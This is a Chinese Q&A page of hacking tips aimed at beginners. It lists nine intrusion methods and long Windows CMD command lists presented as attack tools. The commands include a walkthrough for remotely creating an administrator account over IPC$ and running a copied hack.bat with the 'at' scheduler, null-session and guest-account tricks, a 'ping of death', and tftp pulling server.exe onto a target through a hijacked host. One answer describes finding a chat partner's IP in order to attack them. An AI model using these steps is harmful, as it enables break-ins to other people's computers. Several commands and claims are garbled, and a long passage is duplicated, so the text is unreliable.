本文目录一览：

• 1、黑客要熟悉哪些电脑系统基本操作
• 2、黑客是怎样通过网络入侵电脑的？
• 3、请问新手学黑客攻防要记哪些命令?
• 4、当黑客要懂得哪些主要的CMD命令?
• 5、黑客是如何截取你所发出在信息和如何入侵你的个人计算机？
• 6、我想知道黑客是怎么准确得知他想攻击的电脑的ip地址，或者mac地址的，或者是网络标示的？

黑客要熟悉哪些电脑系统基本操作

黑客也分两种，普通黑客写程序病毒黑别人，厉害的黑客方法很多。首先，编程语言，像C语言、C++、C#、java等，黑客至少要熟练掌握其中六种最基础的，这是做为一名黑客的基础。然后黑客一般都是电子计算机专业的人才，什么软件技术基础等大学必修课必须会，所以黑客一般学历都挺高，是高技术人才。然后黑客要求手速，要求经验，所以黑客也是一种需要积累和指导的职业。还有就是，黑客要懂得网页制作、要跟上潮流知道现有软件的用法和原理，嗯，黑客也不是好当的......打字很辛苦，楼主你懂得~求采纳~

黑客是怎样通过网络入侵电脑的？

黑客是入侵别人电脑的方法有9种。

1、获取口令

这又有三种方法：

一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。

此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2、放置特洛伊木马程序

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。

当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4、电子邮件攻击

电子邮件攻击主要表现为两种方式：

一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；

二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5、通过一个节点来攻击其他节点

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。

6、网络监听

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8、利用帐号进行攻击

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9、偷取特权

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。

请问新手学黑客攻防要记哪些命令?

黑客常用命令（不太全，只是我个人常用的）、、、、、 ping 测试

ping -a ip 对目标ip地址进行反向名称解析，如果解析成功，ping将显示相应的主机名

ping IP -t 连续对IP地址执行PING命令直到CTRL+C中断

ping IP -l 3000 指定PING命令中的数据长度为3000字节

netstat( local address本地地址，foreign address外部地址)

netstat -s 查看本机网络配置信息

netstat -e 查看连接数据包

netstat -r 查看路由表的各种信息

netstat -n 显示已建立连接

netstat -v 显示正在进行的工作

netstat -t 显示TCP协议的连接情况

netstat -a 显示所有SOCKET，包括正在监听的

netstat -u 显示UDP协议的连接情况

nslookup 域名 查询A记录

nslookup -q=mx 域名 查询MX记录

nslookup -q=ns 域名 查询ns记录

ipconfig 查看自己的本地连接和宽带连接

ipconfig /all 显示IP地址MAC地址等附加信息

ipconfig /batch bak-netcfg 将有关网络配置的信息备份到文件BAK-NETCFG中

ipconfig /release 1 去除网卡（适配器1）的动态IP地址

ipconfig /renew 1 为网卡重新动态分配IP地址

tracert 解析路由

dir 列出当前路径下的文件

dir /a 列出当前路径下所有文件包含隐藏的系统的文件

dir /ah 列出当前路径下隐藏的文件包括子目录隐藏的

dir /as 列出系统文件

dir /ad 列出子目录

dir /B 只显示文件名与扩展名

nbtstat -a IP 查看指定IP主机的NETBIOS信息

COPY命令巧妙捆绑：

copy 456.jpg/b + 123.txt/a 789.jpg

首先CD命令到文件的存放位置，456.jpg--文件名，123.txt--文件名，789.jpg--生成的789图片文件。/b--用于指定以二进制格式复制合并文件，/a--用于指定以ASCLL格式复制合并文件，二进制格式文件应该在+前，文本格式文件在+后。

cls 清屏命令

net user 系统账号类操作

net user 账号 密码 /add 建立账号命令

net user 账号 密码 /dll 删除账号命令

net localgroup 系统组操作

net use 远程连接 映射操作

net use \\IP\ipc$ "密码" /user:"用户" IPC￥连接

net use z: \\IP\c$ 映射网络驱动器（C盘到本地E盘）

net use * /del 断开所有IPC连接

net use \\IP\ipc$ /del 断开指定IP目标IPC连接

net time \\IP 查看目标主机的时间

copy 把一个文件拷贝到另一个地方（参照远程添加用户）

at 用来建立计划任务（参照远程添加用户）

net user 用来管理计算机上面的帐号（参照远程添加用户）

net localgroup 用来管理工作组（参照远程添加用户）

net send 信使命令

net start messenger 开启信使服务messenger

net stop messenger 关闭服务

net * 内容 向局域网所有用户发送消息

远程添加用户：

net user 用户名 密码 /add

net localgroup administrators 用户名 /add

命令一：添加一个用户

命令二：表示把用户添加到管理员组（administrators）

打开记事本，键入上面的命令，把该文件另存为后坠名是.bat的文件（这里记为hack.bat）

转到存放hack.bat的目录（比如D盘），键入copy hack.bat \\目标IP\c$ (这样就把hack.bat拷贝到了目标主机的C盘)

首先键入：net time \\目标IP 查看目标主机的时间，再键入： at \\目标IP 时间 要执行的命令。例：at \\192.168.1.1 c:hack.bat

net share 查看本机共享资源

at \\IP 时间 net share c: 使用计划任务开启共享资源

md f:\123..\ 建立超级文件夹（F指本地磁盘，123指文件夹名）

start f:\123..\ 进入超级文件夹

rd f:\123..\ 删除超级文件夹

shutdown -i 打开（关闭计算机）界面，可关指定远程计算机

shutdown -l 注销本计算机

shutdown -s 关闭本计算机

shutdown -r 关闭并重启本计算机

shutdown -a 放弃系统关机

shutdown -m \\(计算机名或IP) -s 远程关闭计算机

shutdown -m \\(计算机名或IP) -r 远程重启计算机

shutdown -m \\(计算机名或IP) -a 远程命令放弃

shutdown -t xx 设置关闭的超时为几秒（xx表示秒）

shutdown -c "comment" 关闭注释（最大127字符）

shutdown -f 强制运行的应用程序关闭而没有警告

shutdown -d [u][p]:xx:yy 关闭原因代码（u是用户代码，p是一个计划的代码，xx是一个主要原因代码[小于256的正整数]，yy是一个次要原因代码[小于65536的正整数]）

at 22:00 Shutdown -s 22：00关机

del d:文件夹\文件名 删除文件，d:指盘符。

cd.. 进入上一层

cd (文件夹名) 进入指定的文件夹

d: 进入D盘

nbtstat -a 计算机名或IP 显示指定计算机NETBIOS信息

nbtstat -n 显示本计算机的NETBIOS信息

nbtstat -c 显示本计算机NEBIOS名称缓存的内容

arp -a Ip 如果我们有多个网卡，那么使用arp -a加上接口的Ip地址，就可以只显示与该接口相关的ARp缓存项目。

arp -s Ip MAC物理地址 绑定其他电脑MAC地址，IP为：目标IP。

arp -d Ip 人工删除一个静态项目（MAC地址）。

format d： 格式化命令，d：代表盘符

format d:/q 快速格式化

format d:/u 无条件格式化

当黑客要懂得哪些主要的CMD命令?

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \ip\c$ 登陆后映射对方C：到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具

有管理员权限,注意：***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上

参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip

协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的

用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设

置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]

数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之

ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，

ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装

目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安

装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏

、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文

件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名 移动文件,

用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件

中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参

数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成

3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指

ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件（所

有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名复制文件和目录树，用参数/Y将

不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二

进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二

进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码

Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理

性的MAC地址。arp -a将显示出全部信息

arp -s ip 物理地址 想ARP高速缓存中人工输入一个静态项目 ,该项目在计算机引导过程中将保持有效状态,或者出现错误的时候 人工配置的物理地址将更新本项目

arp -d ip 本命令能人工栓除一个静态项目

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程

序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读

，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时

间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p 显示以P开头的环境变量

黑客是如何截取你所发出在信息和如何入侵你的个人计算机？

1、获取口令这又有三种方法：一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。2、放置特洛伊木马程序，特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。3、WWW的欺骗技术，在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。4、电子邮件攻击，电子邮件攻击主要表现为两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。5、通过一个节点来攻击其他节点，黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。6、网络监听，网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。7、寻找系统漏洞，许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。8、利用帐号进行攻击。有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。9、偷取特权，利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。10、所以一般电脑用户一定要安装个如360之类的放心杀软，要省心的多

我想知道黑客是怎么准确得知他想攻击的电脑的ip地址，或者mac地址的，或者是网络标示的？

一般分情况而定，如果是在网吧，局域网攻击的话，就根据机器号来判断了，一般主机都是192.168.0.1，或者192.168.1.1 之类的，根据机器号就可以猜出大概了；

也许是聊天时看谁不爽了，想攻击，在命令行中（运行中输入CMD）输入netstat命令来查看对方的IP，用IP在IP136可以中查到对方的地址和网络类型，聊天必开4000；4001端口，其实用什么QQ飘云版，珊瑚虫版之类的都可以。

还有就是社会工程学，不过一般针对某个个人机器的采取行动还是比较少见的，一般都是大型服务器。

总之，根据不同的情况HACKER会用各种工具实现其目的的，不一而足。